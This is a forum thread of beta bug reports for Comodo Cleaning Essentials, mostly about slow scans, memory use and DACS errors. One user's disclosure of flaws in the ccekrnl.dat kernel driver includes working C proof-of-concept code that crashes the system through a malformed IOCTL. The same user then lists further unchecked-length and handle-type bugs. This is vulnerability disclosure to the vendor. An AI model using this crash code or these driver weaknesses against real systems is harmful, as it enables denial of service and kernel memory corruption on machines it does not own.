Comodo Cleaning Essentials BETA Bug Reports

  1. Your Operating System (32 or 64 bit) and Service Pack revision
    Windows 7 64 Bit
  2. Other Security and Utility Software Installed
    MBAM and Hitmanpro
  3. Step by step description to reproduce the issue
    Run a full scan
  4. How you tried to resolve the problem
    I can’t
  5. Upload Memory Dumps on crash if you encounter any
    There is no crash
  6. Attach screenshots to your posts to clarify the issue further
    No need
  7. Any other information you think that might be useful
    Yeah, CCE the scanner uses 1.600k of RAM. Which is horrible…

Hello
I have now downloaded CCE, have switched off when the Defense + CSS.
CCE then started, download updates, Pc restarted.
Then full scan.

I have 120gb, 2gb ram, Win7 Ultimate with CIS.
(Intel Atom 330 1.60GHz)

The problem is the first time when it took almost 5 hours of scanning, after which it hangs during the following process: C:\bootsect.exe

The PC is slowly converting my total, and the processor performance is totally down. The entire RAM is also almost consumed.

ClamAV says: (PUA.Packed.ASPack)
http://www.virustotal.com/file-scan/report.html?id=1ead513209277e335e00a7779d48d43110c8719bd160755280fcc6d5ecc27b29-1293397887

[attachment deleted by admin]

This might explain it:

Is CCE supposed to take 100% CPU while downloading the updates?

  1. Windows xp 32-bit
  2. Other Security and Utility Software Installed: none
  3. Step by step description to reproduce the issue: run a full scan
  4. Upload Memory Dumps on crash if you encounter any: cce.rar

[attachment deleted by admin]

Sorry if this isn’t the correct format - I wrote this up pretty quickly.

You have a security vulnerability (denial of service) in your ccekrnl.dat driver. I’ve attached the test program (as usual ;)).

Instructions:

  1. Run KillSwitch.exe. Whatever it takes to get the ccekrnl.dat driver loaded.
  2. Run TestPh.exe (attached).
  3. Press ENTER.
  4. The computer BSODs.

Tested on XP, 32-bit.

Also: Sorry if I sound like an a**hole, but you guys are referencing a lot of user-passed handles with KernelMode. That’s another set of security vulnerabilities…

Also 2: You don’t pass an ObjectType to ObReferenceObjectByHandle, so I could pass a process handle where you’re assuming it’s a file object, and BSOD the system…

Code:


NTSTATUS status;
HANDLE deviceHandle;
IO_STATUS_BLOCK isb;
UNICODE_STRING deviceName;
OBJECT_ATTRIBUTES objectAttributes;
UCHAR buffer[0x221];

RtlInitUnicodeString(&deviceName, L"\\Device\\CCEKrnl");
InitializeObjectAttributes(
    &objectAttributes,
    &deviceName,
    OBJ_CASE_INSENSITIVE,
    NULL,
    NULL
    );

if (!NT_SUCCESS(NtOpenFile(&deviceHandle, FILE_GENERIC_READ,
    &objectAttributes, &isb, FILE_SHARE_READ | FILE_SHARE_WRITE,
    FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE)))
{
    wprintf(L"Can't open CCEKrnl driver.\n");
    return;
}

wprintf(L"Press ENTER to crash the computer.\n");
getchar();

memset(buffer, 0, sizeof(buffer));

// Buffer length.
*(PULONG)buffer = 0x221;

// The driver expects a length for memset at offset 12.
// Pass a huge one so we overwrite lots of stuff and BSOD.
*(PULONG)(buffer + 12) = 0xdeadbeef;

status = NtDeviceIoControlFile(
    deviceHandle,
    NULL,
    NULL,
    NULL,
    &isb,
    0x7be2054,
    buffer,
    sizeof(buffer),
    NULL,
    0
    );

NtClose(deviceHandle);

[attachment deleted by admin]

That's NOT being an a**hole, that's being very helpful.

If there are any security vulnerabilities or bugs that you're aware of, PLEASE let us know. THE MORE THE BETTER

You can PM melih or any mods with any reports (No Limits), if you want to keep it private

P.S. If anyone bad mouths YOU for reporting bugs, I'll be more than happy to edit that person's post, with warnings or bans if needed :)

It's good, keep it up!

Thanks for the report.

cpf=unknown ???
DACS says file too large, anyway should be a safe file.
Winx64 using KillSwitch 32bit

[attachment deleted by admin]

The scan takes very long time.

[attachment deleted by admin]

That's too long… I am sure there is a bug…

I also believe that there is a bug

from the following file is always end.

the pc is totally off because of slow

C:\bootsect.exe

http://virscan.org/report/de1ffd5ef7b8877589da005e5dd16f8f.html

http://camas.comodo.com/cgi-bin/submit?file=c8c8200e995e71b69af28a099afde8667e5fc2696169d9ab6531526acd5e5a92

Win7 Ultimate 32 bit, 2Gb Ram, 1,60Ghz,
Only Comodo CIS5 Complete, Zemana AntiLogger, WinPatrol free edition and Malwarebytes’ Anti-Malware 1.50.1.1100 (free version), database version: 5402. Windows Defender is turned off
See also attachment: killswitch

[attachment deleted by admin]

I'm not sure this is a COMODO problem, but it's probably worth reporting anyway:

  1. Your Operating System = 64 bit Win7 home premium
  2. Other Security and Utility Software Installed = Microsoft Security Essentials 2, Agnitum Outpost firewall pro 7
  3. Step by step description to reproduce the issue = CCE simply will not open with Outpost firewall installed, even after giving full permissions to CCE under Outpost's settings and/or disabling it completely.
  4. See #3, also tried uninstalling MSE with no luck. CCE only worked after uninstalling Outpost
  5. n/a
  6. n/a
  7. There is no problem with KillSwitch, only with CCE. Surely someone else out there has tried CCE who is also using Outpost; if this problem is only on my system I'd like to know.

Thank you :)

Please read the Original Post, from this part down:

Here is what you need to do in order to identify the problematic file while scanning:
What is shown in the status field doesn’t have to be the file that kills the scan; as the scanner is multithreaded, it could easily be hanging on another file.

Can you please follow this advice and let the devs know which file(s) cause this?

It takes 1:30 hours for me to scan a clean PC which only had SQL Server installed

winxp 32
total used space 5.6gb of 16gb
files scanned 336,740
(there are only 19,764 files)

There is for sure a bad way to scan files: I noticed that for exe files it was scanning all the compressed files inside them. I think that's the principal reason for the slow scan

More bugs in ccekrnl.dat, along with suggestions. Please excuse the made-up function names.

  1. Control code 0x7BE2050 calls CceQueryInformationFile. You should pass Irp->RequestorMode and *IoFileObjectType to ObReferenceObjectByHandle. This applies to all the other functions as well.
  2. Same control code. You pass the variable-length end of SystemBuffer to the Buffer used by CceQueryInformationFile. But you don’t check Length, so I could pass a huge length while requesting a huge amount of information that overflows SystemBuffer, resulting in pool corruption.
  3. Control code 0x7BE2054 calls CceQueryDirectoryFile. You call RtlInitUnicodeString on buffer->FileName, but I could fill the entire buffer from there with 0xff and there could be a chance, however small, that RtlInitUnicodeString will keep scanning for a zero into invalid memory. You should make user-mode pass a UNICODE_STRING because it’s easier to probe.
  4. Same control code. I already reported that Length wasn’t getting checked.
  5. CceWriteFile. You don’t check Length.
  6. CceReadFile. You don’t check Length.
  7. In both CceWriteFile and CceReadFile you don’t acquire the file object lock, and you don’t check if the file was opened for synchronous I/O, which could be a problem…
  8. Your custom create-file and close-file thing is just plain weird… :o

BTW, I’m getting the impression that you guys don’t really care if this driver is secure (that file object thing scares me). Please let me know if that’s the case :).
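
Added example (not part of the original posts and not Comodo's code): a user-space C model of the length and string checks the two ccekrnl.dat reports above ask for on a buffered request. Offsets 0 and 12 follow the posted test program; the name tail at offset 16 and the `out_cap` parameter are assumptions, and the handle-type check is not modeled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout: 0 and 12 as in the posted test program; 16 is hypothetical. */
enum { OFF_TOTAL = 0, OFF_LENGTH = 12, OFF_NAME = 16 };
enum { REQ_OK, REQ_TOO_SMALL, REQ_BAD_TOTAL, REQ_BAD_LENGTH, REQ_UNTERMINATED };

/* in/in_len stand for SystemBuffer and InputBufferLength; out_cap stands for
   the real size of the buffer the handler is about to fill (assumed). */
int validate_request(const unsigned char *in, size_t in_len, size_t out_cap)
{
    uint32_t total, length;
    size_t i, chars;
    if (in_len < OFF_NAME + sizeof(uint16_t))
        return REQ_TOO_SMALL;               /* header plus one name character */
    memcpy(&total, in + OFF_TOTAL, sizeof total);
    memcpy(&length, in + OFF_LENGTH, sizeof length);
    if (total > in_len)
        return REQ_BAD_TOTAL;               /* caller claims more than it sent */
    if (length > out_cap)
        return REQ_BAD_LENGTH;              /* would write past the real buffer */
    chars = (in_len - OFF_NAME) / sizeof(uint16_t);
    for (i = 0; i < chars; i++) {           /* bounded scan, never past in_len */
        uint16_t ch;
        memcpy(&ch, in + OFF_NAME + i * sizeof ch, sizeof ch);
        if (ch == 0)
            return REQ_OK;
    }
    return REQ_UNTERMINATED;                /* no terminator inside the buffer */
}

/* Constructed sample: a zero-filled 0x221-byte request like the one posted. */
int check_sample(uint32_t length, int fill_ff, size_t out_cap)
{
    unsigned char buf[0x221];
    uint32_t total = sizeof buf;
    memset(buf, 0, sizeof buf);
    if (fill_ff)                            /* name tail with no terminator */
        memset(buf + OFF_NAME, 0xff, sizeof buf - OFF_NAME);
    memcpy(buf + OFF_TOTAL, &total, sizeof total);
    memcpy(buf + OFF_LENGTH, &length, sizeof length);
    return validate_request(buf, sizeof buf, out_cap);
}

int main(void)
{
    printf("%d %d %d\n", check_sample(0xdeadbeef, 0, 0x200),
           check_sample(0x100, 1, 0x200), check_sample(0x100, 0, 0x200));
    return 0;
}
```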

Thanks wj32 for all your help, keep up the good work.

[at] egemen

I know that you guys are working on fixing DACS, but I thought that this might help.

On my end, DACS sometimes works and sometimes doesn’t, but when it works only the DACS F-secure always gives me a DACS.error (times out)!!, and all the other DACS AVs are working perfectly. It’s always like that when it works on my end. (see attached picture).

edit : Win Vista sp2 32bit , Norton av 2011 , CIS 5 (w/ AV disabled).

[attachment deleted by admin]

Hi

Unable to run CCE from a limited account. Although CCE prompts for administrator rights on launch, entering the administrator password does not work. Using “Run As” (with the same dialog box) works.

:)

  1. Your Operating System (32 or 64 bit) and Service Pack revision: XP Pro SP3 (32-bit)
  2. Other Security and Utility Software Installed: CIS, CB, CSC, CDE (beta), TrueCrypt and Secunia PSI
  3. Step by step description to reproduce the issue: Load CCE.exe under limited account
  4. How you tried to resolve the problem: Using “Run As” gets around problem
  5. Upload Memory Dumps on crash if you encounter any (see on bottom on how to do a memory dump or force it to produce a memory dump) <– This makes it easier for the developers to fix stubborn bugs, freezes, glitches and such WITH THE BUG REPORT (not required but very very helpful) (If you don’t want to post the link to the memory dump, then PM a Mod with the link for the dump): n/a
  6. Attach screenshots to your posts to clarify the issue further: n/a
  7. Any other information you think that might be useful: n/a

Hi, Graham1
Thanks for your report.

I dunno if it’s a bug but for me DACS never works at work behind a proxy. CCE is updating signatures without problems but DACS always shows this

Win XP x32 SP3 fully updated.
Funny is that at home (Seven x64) with “unsupported” x64 KillSwitch DACS is working fine.

[attachment deleted by admin]

That’s strange where is DACS.Avast on the Verdict list ??? ???